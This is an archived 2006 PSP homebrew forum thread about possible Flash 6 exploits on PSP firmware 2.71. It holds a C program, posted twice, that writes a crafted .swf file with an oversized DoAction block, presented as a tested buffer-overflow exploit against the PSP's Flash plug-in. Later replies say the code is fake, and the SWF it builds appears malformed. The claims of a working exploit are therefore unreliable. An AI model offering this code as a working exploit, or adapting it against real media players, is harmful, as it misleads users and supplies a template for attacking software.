As some people might allready know there were three expliots for flash 6 for ie, netscape, and other broswers. Has anyone tried these exploits for their psp flash. If any doesn't belive me they can read for themselves at news
And the version of flash for the psp is 6,0,72,27
Maybe there was an exploit in flash with fw 2.7 and thats why 2.71 came out to patch it just a few ideas. By the way im not a hacker im a stoner.
Full Version: Flash exploits!
Console Spot Forums > Firmware & Homebrew Section > PSP Homebrew Development & Help > Firmwares & More
hmmmmmmm..... u might be on to something
QUOTE(h3r3t1c @ Jul 12 2006, 03:08 PM) 
hmmmmmmm..... u might be on to something
Its works on ie 6 but who knows if psp version is a port or isn,t patched i might work but like i said i spend more time smoking pot than trying to hack lol
QUOTE(h3r3t1c @ Jul 12 2006, 01:08 PM)
hmmmmmmm..... u might be on to something
h3r3t1c some people have found this exploit and have actually tried to do something with it but they concluded that sony has a different "edited" version of the flash player and and also if/when they try to launch the exploit they get the out of memory error
but this would probably be something to look towards rather than trying to find sony's encrytion key
cool
I have seen some people trying to use flash to edit the firmware of the psp for a downgrader. That would be a good thing to try.
I hoped this section of code has the help to everybody! This code comes from other hackers!
--------------------------------------------------------------------------------------
Originally Posted by coder X
Hello Coder X here, Below it the code for an Bufferoverrun exploite i found using the PSP 2.71 flash browser plug-in
Any one intrested in using the exploite and making a e-loader, please give me credit for the exploite, and contact me, we can work togeter to make it.
This is a tested exploite and does work, so i hope you all enjoy, 2.71 uses Welcome to Homebrew
I will be working on a bin for the program so expect tetris or something out in a bit.
Code:
/*
* ************************* ************************* *********
* PSP FW 2.71 Overflow Test
************************* ************************* ***********
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void usage(char* file);
/*
<swf>
...
</swf>
*/
char SWF[] = "<swf>";
char SWF_[] = "</swf>";
//[SetBackgroundColor]
char SetBackgroundColor[] = "\x43\x02\xff\x00\x00";
//[DoAction] 1 pwn j00r 455!
char DoAction[] =
"\x3c\x03\x9b\x08\x00\x41\ x41\x41\x41\x41\x41\x41\x 41\x00\x40\x00"
"\x42\x42\x42\x42\x42\x42\ x42\x42\x00\x43\x43\x43\x 43\x43\x43\x43"
"\x43\x00\x44\x44\x44\x44\ x44\x44\x44\x44\x00\x45\x 45\x45\x45\x45"
"\x45\x45\x45\x00\x46\x46\ x46\x46\x46\x46\x46\x46\x 00\x00";
//[ShowFrame]
char ShowFrame[] = "\x40\x00";
//[End]
char End[] = "\x00\x00";
int main(int argc,char* argv[])
{
system("cls");
printf("\n* ************************* ************************* ******* *");
printf("\n* Sony you can kiss my ass, 2.71 Welcome to Homebrew *");
printf("\n* ************************* ************************* ******* *");
if ( argc!=2 )
{
usage(argv[0]);
}
FILE *f;
f = fopen(argv[1],"w");
if ( !f )
{
printf("\nFile couldnt open!");
exit(1);
}
printf("\n\nWriting crafted .swf file . . .");
fwrite(SWF,1,sizeof(SWF), f);
fwrite("\n",1,1,f);
fwrite(SetBackgroundColor ,1,sizeof(SetBackgroundCo lor),f);
fwrite("\n",1,1,f);
fwrite(DoAction,1,sizeof( DoAction),f);
fwrite("\n",1,1,f);
fwrite(ShowFrame,1,sizeof (ShowFrame),f);
fwrite("\n",1,1,f);
fwrite(End,1,sizeof(End), f);
fwrite("\n",1,1,f);
fwrite(SWF_,1,sizeof(SWF_ ),f);
printf("\nFile created successfully!");
printf("\nFilename: %s",argv[1]);
return 0;
}
void usage(char* file)
{
printf("\n\n");
printf("\n%s <Filename>",file);
printf("\n\nFilename = .swf crafted file. Eg: overflow.swf");
exit(1);
}
remember people keep you pants on. this dosent nesssarily mean downgrader. this is just an exploit like the .tiff for 1.5 (except its a swf and works differently)
ected selected>font 7pt 8pt 9pt 10pt 12pt 15pt 18pt 20pt 25pt 30pt
----------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------
Originally Posted by coder X
Hello Coder X here, Below it the code for an Bufferoverrun exploite i found using the PSP 2.71 flash browser plug-in
Any one intrested in using the exploite and making a e-loader, please give me credit for the exploite, and contact me, we can work togeter to make it.
This is a tested exploite and does work, so i hope you all enjoy, 2.71 uses Welcome to Homebrew
I will be working on a bin for the program so expect tetris or something out in a bit.
Code:
/*
* ************************* ************************* *********
* PSP FW 2.71 Overflow Test
************************* ************************* ***********
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void usage(char* file);
/*
<swf>
...
</swf>
*/
char SWF[] = "<swf>";
char SWF_[] = "</swf>";
//[SetBackgroundColor]
char SetBackgroundColor[] = "\x43\x02\xff\x00\x00";
//[DoAction] 1 pwn j00r 455!
char DoAction[] =
"\x3c\x03\x9b\x08\x00\x41\ x41\x41\x41\x41\x41\x41\x 41\x00\x40\x00"
"\x42\x42\x42\x42\x42\x42\ x42\x42\x00\x43\x43\x43\x 43\x43\x43\x43"
"\x43\x00\x44\x44\x44\x44\ x44\x44\x44\x44\x00\x45\x 45\x45\x45\x45"
"\x45\x45\x45\x00\x46\x46\ x46\x46\x46\x46\x46\x46\x 00\x00";
//[ShowFrame]
char ShowFrame[] = "\x40\x00";
//[End]
char End[] = "\x00\x00";
int main(int argc,char* argv[])
{
system("cls");
printf("\n* ************************* ************************* ******* *");
printf("\n* Sony you can kiss my ass, 2.71 Welcome to Homebrew *");
printf("\n* ************************* ************************* ******* *");
if ( argc!=2 )
{
usage(argv[0]);
}
FILE *f;
f = fopen(argv[1],"w");
if ( !f )
{
printf("\nFile couldnt open!");
exit(1);
}
printf("\n\nWriting crafted .swf file . . .");
fwrite(SWF,1,sizeof(SWF), f);
fwrite("\n",1,1,f);
fwrite(SetBackgroundColor ,1,sizeof(SetBackgroundCo lor),f);
fwrite("\n",1,1,f);
fwrite(DoAction,1,sizeof( DoAction),f);
fwrite("\n",1,1,f);
fwrite(ShowFrame,1,sizeof (ShowFrame),f);
fwrite("\n",1,1,f);
fwrite(End,1,sizeof(End), f);
fwrite("\n",1,1,f);
fwrite(SWF_,1,sizeof(SWF_ ),f);
printf("\nFile created successfully!");
printf("\nFilename: %s",argv[1]);
return 0;
}
void usage(char* file)
{
printf("\n\n");
printf("\n%s <Filename>",file);
printf("\n\nFilename = .swf crafted file. Eg: overflow.swf");
exit(1);
}
remember people keep you pants on. this dosent nesssarily mean downgrader. this is just an exploit like the .tiff for 1.5 (except its a swf and works differently)
ected selected>font 7pt 8pt 9pt 10pt 12pt 15pt 18pt 20pt 25pt 30pt
----------------------------------------------------------------------------------------------
are you serious timthy??!!
does this works??!!
and does this code only work with 2.71 or 2.60/2.70???
does this works??!!
and does this code only work with 2.71 or 2.60/2.70???
THATS FAKE
yep that has been on a number of psp forums and has been confirmed fake
The PSP uses a custom flash player and a custom web browser so imo i doubt that flash 6 exploits will work, exploits will have to be found for the PSP's version of flash!!!!
Well I don't really know much about flash apart from some actionscript.
ANYWAY THAT SCRIPT ISN'T ACTIONSCRIPT ITS C++
Well I don't really know much about flash apart from some actionscript.
ANYWAY THAT SCRIPT ISN'T ACTIONSCRIPT ITS C++
QUOTE(ghey @ Jul 25 2006, 06:13 PM)
ANYWAY THAT SCRIPT ISN'T ACTIONSCRIPT ITS C++
Technically it's C, lol.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.